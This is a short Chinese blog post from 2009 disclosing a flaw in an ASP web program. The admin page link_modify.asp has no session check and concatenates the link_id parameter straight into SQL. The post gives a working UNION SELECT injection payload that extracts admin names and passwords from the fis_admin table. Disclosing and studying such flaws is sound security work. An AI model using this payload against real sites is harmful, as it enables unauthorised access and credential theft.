Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3029698
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-05 22:56:28

首先说下作者在程序中代码的顺序错误

<%
if session("adminuser")="" then
  response.Redirect("login.asp")
end if
%>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>


<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
这样一句好像是多此一举 而且位置放错了 程序使用的是vbscript 默认的
不要这句的 而且这句只能放在代码的最顶端吧
漏洞出现在 fis/login/link_modify.asp 里 看了下后台文件 大都有
session的验证 唯独这里没有 再看下代码:
<%
linkid=request("link_id")
if linkid<>"" then
set linkrs=server.CreateObject("adodb.recordset")
sqllink="select * from fis_links where link_id="& linkid
linkrs.open sqllink,conn,1,3
%>
典型的不能再典型的注入了 打开表 link_id 数了下一共6个字段 在页面上有
字段内容的rs输出 所以我们使用联合查询直接爆喽
... 0union%20select%201,admin_name,admin_pass,4,5,6%20from%20fis_admin
阅读(648) | 评论(0) | 转发(0) |
0

上一篇:JCZ3 0.2 BETA

下一篇:风讯 4.0 SP7 getshell 0day

给主人留下些什么吧!~~